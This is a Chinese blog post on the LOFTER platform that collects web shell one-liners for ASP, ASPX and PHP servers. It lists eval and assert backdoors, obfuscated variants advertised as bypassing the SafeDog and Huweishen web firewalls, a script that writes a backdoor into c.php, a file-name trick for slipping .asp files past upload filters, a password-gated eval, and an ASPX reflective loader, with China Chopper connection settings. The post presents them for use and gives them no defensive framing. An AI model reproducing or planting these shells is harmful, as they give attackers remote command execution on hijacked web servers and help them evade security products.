LOFTER-网易轻博

收集的各种一句话

 1、asp一句话木马:<%eval request(“x”)%>

2、php一句话木马:<?php eval($_POST[g]);?>
3、aspx一句话:<%@ Page Language=”Jscript”%><%eval(Request.Item["x"],”unsafe”);%>
4、数据库加密一句话(密码a):┼攠數畣整爠煥敵瑳∨≡┩愾
5、网站配置、版权信息专用一句话:”%><%Eval Request(x)%>
6、一句话再过护卫神:<%Y=request(“x”)%> <%execute(Y)%>

7、过拦截一句话木马:<% eXEcGlOBaL ReQuEsT(“x”) %>

 

8、asp闭合型一句话 %><%eval request(“0o1Znz1ow”)%><%
9、能过安全狗的解析格式:;hfdjf.;dfd.;dfdfdfd.asp;sdsd.jpg www.toreadsafe.xyz
10、突破安全狗的一句话:<%Y=request(“x”)%> <%eval(Y)%>
11、elong过安全狗的php一句话:<?php  $a = “a”.”s”.”s”.”e”.”r”.”t”;  $a($_POST[cc]);  ?>

16、突破护卫神,保护盾一句话
<?php $a = str_replace(x,”",”axsxxsxexrxxt”);
$a($_POST["test"]); ?>

13.高强度php一句话
<?php substr(md5($_REQUEST['heroes']),28)==’acd0′&&eval($_REQUEST['c']);?>

12、后台常用写入php一句话(密码x):
<?
$fp = @fopen(“c.php”, ‘a’);
f@fwrite($fp, ‘<’.'?php’.”\r\n\r\n”.’eval($_POST[x])’.”\r\n\r\n?”.”>\r\n”);
@fclose($fp);
?>

17、许多网页程序都不允许包含〈%%〉标记符号的内容的文件上传,这样一句话木马就写入不进数据库了。
‘ E& Y; Y1 R$ s# ]. L$ c改成:〈scriptlanguage=VBScript runat=server〉execute request(“l”)〈/Script
这样就避开了使用〈%%〉,保存为.ASP,程序照样执行的效果是一样的

18、PHP高强度一句话:
<?php substr(md5($_REQUEST['x']),28)==’acd0′&&eval($_REQUEST['c']);?>   菜刀连接:/x.php?x=lostwolf  脚本类型:php  密码:c
<?php assert($_REQUEST["c"]);?>    菜刀连接 躲避检测 密码:c

突破安全狗的aspx的一句话
<%@ Page Language=”C#” ValidateRequest=”false” %>
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance(“c”, true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>



推荐文章
评论(0)
联系我们|招贤纳士|移动客户端|风格模板|官方博客
网易公司版权所有 ©1997-2018 浙公网安备 33010002000017号ICP备:浙B2-20090185-5增值电信业务经营许可证:浙B2-20090185
分享到
转载我的主页